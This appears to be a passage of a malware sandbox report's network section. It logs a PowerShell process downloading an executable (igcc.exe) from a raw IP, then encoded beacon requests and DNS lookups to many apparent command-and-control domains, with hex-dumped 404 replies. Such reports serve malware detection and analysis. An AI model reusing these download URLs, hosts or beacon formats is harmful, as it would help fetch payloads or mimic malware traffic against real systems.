                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: unknown TCP traffic detected without corresponding DNS query: 172.245.208.21
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00A97A18 URLDownloadToFileW,3_2_00A97A18
                  Source: global traffic HTTP traffic detected: GET /233/igcc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.208.21Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /1imc/?UV90oJV=GkZ+7lZN5ZbT6rZArZ+XuW2LS/GQFqiR2eAXidPe90Y9rybDHdv8GRqVb6FfMfkpXSVDgNv2zaXT/X0CpEMHyOeTTSnvzCMVpGnq9juhbcH3k1fZ/Ho823c=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.worrr37.yachtsUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /ma0g/?LVsla=JHrxl4t&UV90oJV=H2S90RmziCMvLCuK8yTaL3f2umhuNHnT+UjWuF5QkK5TSoHa4lhKP7xjBIvwYHsxlglzK0GWG6GIcHietPpqxtVwo9BPmEy9xm5LwWe49kMrhYdXnmUTf+U= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.soportemx-findmy.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /lvz4/?LVsla=JHrxl4t&UV90oJV=Xs1PCb/MaYPIPAxC0xa5KYs0mBAqh55MCQOIGo7Nl8rFa4QZz+K5GgFtLYl71/JRpNHUa5jW6jDEqn+5iMTLUOrlc9oIlR4hoTx0RRj+HMWFGvWCftcbeJU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.vczuahand.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /q86a/?UV90oJV=1RS/DLESjC/mKKX8H/biPEM9gARAP1aCo7MGFq+OZJ2Pg2HsdXdlDjVOv2U28y6Xqr87siUnw8FG4MQCr+RpE4Jbc2RQrC0NObuWRju52AhcIqb+addZL2w=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.855696a.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /pl23/?UV90oJV=pwQm/8Nry++CWhwQL+edwmsiGWUfvm6b9cWiDzs/wKG7gU2SU1fIaah3O92QYMu9f5MkpzQiI887Voc7ljrK5SXzymeZM+96L5laMJ6YTiuiIGaOCWa6b3c=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.headset2.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /q4wg/?UV90oJV=WxORhD4RgEO5uNW184qlq8Q0sLDKmVXJQFKGj9LBFcZ0l1e50YnvQ+dx8Uckd3rx1A/7IdNYVLsTEbVWPiDE6kUoQ6MsB12dGIVZYU7ysqzBCJWSaxY+T48=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.futureedge.websiteUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /b8n0/?LVsla=JHrxl4t&UV90oJV=kyUzpDR/GXT4UV/+nqvvJVx8HRrNNeN1bnrOTHFLjUDm6VF6u4qvCiKuxhi22xyg+3lxI6NA/7DjeYVJhJi69sZr4sjCAoWURSuJ0WnZK+Wxfh1+frT+mkg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.meshki-co-uk.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /6npl/?UV90oJV=/JYiv5NhO0tELAK8hKXRL6yPw09VuQMvi5BuLmngF2OWbpzZErtHeLuo5nDg79GzI2QTdod40q0r+J2P58yW7/6plb4OcALkiS6guO79bLlT8DxgdN065to=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.anyang-590303492.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /m5zm/?UV90oJV=PmzW3uKrzkvafX7YmWso/UgbPLCln62W7aZsDeQW57a8PFgVuI396d9PnNPN9UkA9AF+Unyq0/1iIG4gmLCCW+qdaIFQzw6LJwxTaHYvFotAr8O8Y9RkveE=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.reiki.voyageUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /a2xu/?UV90oJV=jG6ux6r2iflBaU1tQVCr9K9Q4L27yHdJpXWErKL/4Ad9P/5nkj55oo2gDOwPZNYoN7pHD3In5mvXkhGBF69yz65s7gEqX6dtQwXXozW7lMq8H9Uo2bG9SNE=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.akfix-msk.storeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /ca0u/?UV90oJV=MvRre+3QwZ6yIy+2fyz7YvSSWTAdcKEGQPe5yQw4H7cZIU9bypTiCFjTFWtHevCXXt6GxLHI1FAEgZfYXX1jhre07MuBOcgxovAcCWT1F0UOuG5xezV3UzM=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.malayexpess.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /pji1/?LVsla=JHrxl4t&UV90oJV=oPSxN0d9Y70P2riykwj378jDK4dA5CWov285JwcUKQzMmNdemng31QxGRPhWi1n81NmvKhZ2Lkv1YeaEtRyFRChPj4DjhNDfDC0AWPeNp3jL6YRDWHxMF/w= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.play-venom-rush.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic HTTP traffic detected: GET /qasf/?UV90oJV=yuIihCwMXqfTMsBlSG09EuTWxsYqILBvxKvjbtWwi1EQdqGXerweWu7wqlk+gPqu8qljoC2xXboDZUnh0VRArwDFUnRa3BfVv9e4xBxD9zej7fg5DR8Kde0=&LVsla=JHrxl4t HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeHost: www.jicode.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                  Source: global traffic DNS traffic detected: DNS query: www.thykingdomwear.store
                  Source: global traffic DNS traffic detected: DNS query: www.worrr37.yachts
                  Source: global traffic DNS traffic detected: DNS query: www.soportemx-findmy.click
                  Source: global traffic DNS traffic detected: DNS query: www.blackhat.chat
                  Source: global traffic DNS traffic detected: DNS query: www.vczuahand.xyz
                  Source: global traffic DNS traffic detected: DNS query: www.855696a.xyz
                  Source: global traffic DNS traffic detected: DNS query: www.headset2.online
                  Source: global traffic DNS traffic detected: DNS query: www.futureedge.website
                  Source: global traffic DNS traffic detected: DNS query: www.meshki-co-uk.shop
                  Source: global traffic DNS traffic detected: DNS query: www.forjoyi.live
                  Source: global traffic DNS traffic detected: DNS query: www.anyang-590303492.click
                  Source: global traffic DNS traffic detected: DNS query: www.reiki.voyage
                  Source: global traffic DNS traffic detected: DNS query: www.akfix-msk.store
                  Source: global traffic DNS traffic detected: DNS query: www.malayexpess.online
                  Source: global traffic DNS traffic detected: DNS query: www.play-venom-rush.xyz
                  Source: global traffic DNS traffic detected: DNS query: www.jicode.xyz
                  Source: unknown HTTP traffic detected: POST /ma0g/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 204Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedHost: www.soportemx-findmy.clickOrigin: http://www.soportemx-findmy.clickReferer: http://www.soportemx-findmy.click/ma0g/User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516Data Raw: 55 56 39 30 6f 4a 56 3d 4b 30 36 64 33 6e 4c 70 6f 77 42 35 62 30 66 7a 2b 6c 54 47 4d 31 2b 53 35 45 67 56 65 30 37 6a 72 46 50 4b 6b 7a 5a 62 6f 34 35 78 44 62 2b 63 38 55 64 70 50 66 74 55 4f 62 32 75 66 33 6b 76 68 41 39 69 54 43 57 50 53 5a 37 73 4b 6c 32 7a 68 2b 64 50 6f 65 39 6b 31 4b 41 50 74 30 2b 74 36 41 74 76 34 57 66 4e 71 58 30 33 73 4e 45 6f 6e 58 51 77 46 4f 76 41 45 6c 47 75 7a 76 6a 50 64 71 5a 4b 58 36 57 6c 54 64 79 4f 41 45 4c 30 4f 61 51 6f 71 4d 74 32 2f 78 63 2b 33 54 42 34 48 49 41 56 39 34 6d 76 66 57 41 36 48 35 46 45 35 54 35 62 6c 67 5a 59 30 55 4f 35 4f 2f 61 56 74 51 3d 3d Data Ascii: UV90oJV=K06d3nLpowB5b0fz+lTGM1+S5EgVe07jrFPKkzZbo45xDb+c8UdpPftUOb2uf3kvhA9iTCWPSZ7sKl2zh+dPoe9k1KAPt0+t6Atv4WfNqX03sNEonXQwFOvAElGuzvjPdqZKX6WlTdyOAEL0OaQoqMt2/xc+3TB4HIAV94mvfWA6H5FE5T5blgZY0UO5O/aVtQ==
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:28 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:31 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "67c25548-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:38 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:41 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 15 Apr 2025 15:21:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 